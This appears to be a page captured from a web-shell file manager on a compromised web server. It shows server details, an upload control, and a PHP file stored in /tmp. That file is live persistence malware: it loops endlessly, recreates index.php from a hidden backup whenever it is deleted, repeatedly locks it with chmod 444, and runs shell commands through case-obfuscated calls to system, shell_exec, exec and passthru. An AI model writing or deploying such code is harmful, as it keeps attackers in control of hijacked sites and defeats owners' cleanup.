HEX
Server: LiteSpeed
System: Linux web0101.theory7.net 5.14.0-570.37.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Aug 26 10:33:12 EDT 2025 x86_64
User: t7x1378p822w (2195)
PHP: 8.4.12
Disabled: NONE
Upload Files
File: //tmp/99a07a4bf24afd62d56c1063a7936815indexxhand.Lock
<?php
    $tmp = "/tmp";
    $fileperm = d7net_perm("index.php");
    d7net_cmd("chmod 444 index.php");
    while (True) {
        if (!file_exists("index.php")) {
            $var = base64_encode(file_get_contents($tmp . "/e3e083759b27214400485496d3187052indexxd7net.Lock"));
            FiLe_pUt_ConTentS("index.php", base64_decode($var));
        }
        if ($fileperm != "0444"){
            d7net_cmd("chmod 444 index.php");
        }
    }
    function d7net_cmd($value)
    {
        if (function_exists("system")) {
            sYsTem($value);
        } else if (function_exists("shell_exec")) {
            return ShEll_eXeC($value);
        } else if (function_exists("exec")) {
            return ExEc($value);
        } else if (function_exists("passthru")) {
            return pAsSThRu($value);
        }
    }
    function d7net_perm($filez){
        return substr(sprintf("%o", fileperms($filez)), -4);
    }